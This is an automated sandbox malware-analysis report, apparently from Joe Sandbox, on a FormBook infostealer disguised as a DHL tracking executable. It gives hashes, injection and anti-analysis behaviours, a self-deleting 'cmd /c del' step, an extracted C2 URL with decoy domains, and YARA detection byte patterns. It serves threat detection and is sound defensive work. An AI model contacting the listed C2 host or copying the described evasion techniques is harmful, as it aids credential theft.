Windows Analysis Report
DHL AWB TRACKING DETAILS.exe

Overview

General Information

Sample Name: DHL AWB TRACKING DETAILS.exe
Analysis ID: 562043
MD5: 4e358b432ba956c13627beee054d68e5
SHA1: 8791318da047e93f2a16cc6535eba5159228f832
SHA256: 836696cddebff5d522acb2c105a404ceeb635df69b3c9544b5bebcef13bc3e86
Tags: DHL, exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • DHL AWB TRACKING DETAILS.exe (PID: 6228 cmdline: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" MD5: 4E358B432BA956C13627BEEE054D68E5)
    • DHL AWB TRACKING DETAILS.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" MD5: 4E358B432BA956C13627BEEE054D68E5)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 7012 cmdline: /c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 4636 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 5560 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup
{"C2 list": ["www.hdetpnipa.xyz/a34b/"], "decoy": ["mesonarte.com", "eksiwakun9.xyz", "dustcollectionconsultant.com", "heliosarchitecture.com", "chinaanalysisgroup.com", "nimbinhillshemp.com", "ychain.biz", "mountshastaart.com", "monstermangoloco.com", "bodhiandbear.com", "rootednft.xyz", "metayema.com", "zw21.xyz", "criccketworld.com", "segurobarato.net", "ananyacap.com", "momo-momo.xyz", "ezrealestatedeals.com", "ghrde.xyz", "idimol.com", "pcthspoe.xyz", "thewhiteswanharringworth.com", "che8760.com", "85111280.xyz", "apteka-magnolia.com", "proach.online", "portfolioabeckford.com", "affilinvest.com", "subspank.xyz", "odessamadrecoffeehouse.com", "onetrade.biz", "tianfuhg.com", "kibtitalikeniwenti.com", "terriblearttours.com", "saudirelief.com", "metacourting.xyz", "kimera.blue", "mgpsfm.com", "metawzrd.com", "veahhiodl.xyz", "alimasurfhotel.com", "sirensandiego.com", "gd-hxgg.com", "aurorarift.com", "clingbee.com", "zettavisor2021.xyz", "gregoryryankramer.art", "robertsonfandc.com", "sociedadgeograficacafe.com", "emilyhkeefer.com", "v-hush.com", "judithtuttle.xyz", "itbrandlink.com", "carrybicycles.com", "storge-evolution.com", "socnhhpa.xyz", "victorzark.com", "ghettoguy.com", "redtruckguy.com", "jeanmariewallendorf.com", "ocpdtel.xyz", "democracies.online", "bw529twonineh5.world", "chinhdohuyenthoai.xyz"]}
Source | Rule | Description | Author | Strings
0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source | Rule | Description | Author | Strings
      1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          No Sigma rule has matched

          AV Detection

          Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hdetpnipa.xyz/a34b/"], "decoy": ["mesonarte.com", "eksiwakun9.xyz", "dustcollectionconsultant.com", "heliosarchitecture.com", "chinaanalysisgroup.com", "nimbinhillshemp.com", "ychain.biz", "mountshastaart.com", "monstermangoloco.com", "bodhiandbear.com", "rootednft.xyz", "metayema.com", "zw21.xyz", "criccketworld.com", "segurobarato.net", "ananyacap.com", "momo-momo.xyz", "ezrealestatedeals.com", "ghrde.xyz", "idimol.com", "pcthspoe.xyz", "thewhiteswanharringworth.com", "che8760.com", "85111280.xyz", "apteka-magnolia.com", "proach.online", "portfolioabeckford.com", "affilinvest.com", "subspank.xyz", "odessamadrecoffeehouse.com", "onetrade.biz", "tianfuhg.com", "kibtitalikeniwenti.com", "terriblearttours.com", "saudirelief.com", "metacourting.xyz", "kimera.blue", "mgpsfm.com", "metawzrd.com", "veahhiodl.xyz", "alimasurfhotel.com", "sirensandiego.com", "gd-hxgg.com", "aurorarift.com", "clingbee.com", "zettavisor2021.xyz", "gregoryryankramer.art", "robertsonfandc.com", "sociedadgeograficacafe.com", "emilyhkeefer.com", "v-hush.com", "judithtuttle.xyz", "itbrandlink.com", "carrybicycles.com", "storge-evolution.com", "socnhhpa.xyz", "victorzark.com", "ghettoguy.com", "redtruckguy.com", "jeanmariewallendorf.com", "ocpdtel.xyz", "democracies.online", "bw529twonineh5.world", "chinhdohuyenthoai.xyz"]}
          Source: DHL AWB TRACKING DETAILS.exe, Virustotal: Detection: 43%
          Source: DHL AWB TRACKING DETAILS.exe, ReversingLabs: Detection: 48%
          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: www.hdetpnipa.xyz/a34b/, Avira URL Cloud: Label: phishing
          Source: www.hdetpnipa.xyz/a34b/, Virustotal: Detection: 9%
          Source: C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll, Virustotal: Detection: 37%
          Source: C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll, ReversingLabs: Detection: 25%
          Source: DHL AWB TRACKING DETAILS.exe, Joe Sandbox ML: detected
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 31.2.explorer.exe.f07f840.1.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 20.0.explorer.exe.ad0f840.6.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.wlanext.exe.382f840.4.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 11.2.wlanext.exe.deef30.0.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 20.0.explorer.exe.ad0f840.3.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 20.0.explorer.exe.ad0f840.0.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: DHL AWB TRACKING DETAILS.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: DHL AWB TRACKING DETAILS.exe, 00000000.00000003.360349373.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000003.360736432.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436271704.0000000000AFF000.00000040.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DHL AWB TRACKING DETAILS.exe, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436271704.0000000000AFF000.00000040.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.437702980.00000000029F0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.437702980.00000000029F0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe, Code function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe, Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe, Code function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe, Code function: 4x nop then pop esi, 1_2_004172DE
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe, Code function: 4x nop then pop esi, 1_2_004172A0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 4x nop then pop esi, 11_2_00A172A0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 4x nop then pop esi, 11_2_00A172DE

          Networking

          Source: Malware configuration extractor, URLs: www.hdetpnipa.xyz/a34b/
          Source: explorer.exe, 00000014.00000003.578175539.0000000004EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.543845759.0000000004EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.550839224.0000000004EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.555983128.0000000004EEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.553114910.0000000004EEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.566169156.0000000004ED2000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000014.00000003.556038613.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.553294057.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.566295637.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.578401411.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.v
          Source: DHL AWB TRACKING DETAILS.exe, DHL AWB TRACKING DETAILS.exe, 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000000.352121005.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000000.355752258.0000000000409000.00000008.00000001.01000000.00000003.sdmp, String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: DHL AWB TRACKING DETAILS.exe, 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000000.352121005.0000000000409000.00000008.00000001.01000000.00000003.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000000.355752258.0000000000409000.00000008.00000001.01000000.00000003.sdmp, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.379142678.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.366064196.000000000095C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.398584347.000000000095C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknown, DNS traffic detected: queries for: www.chinaanalysisgroup.com
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe, Code function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F61

          E-Banking Fraud

          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
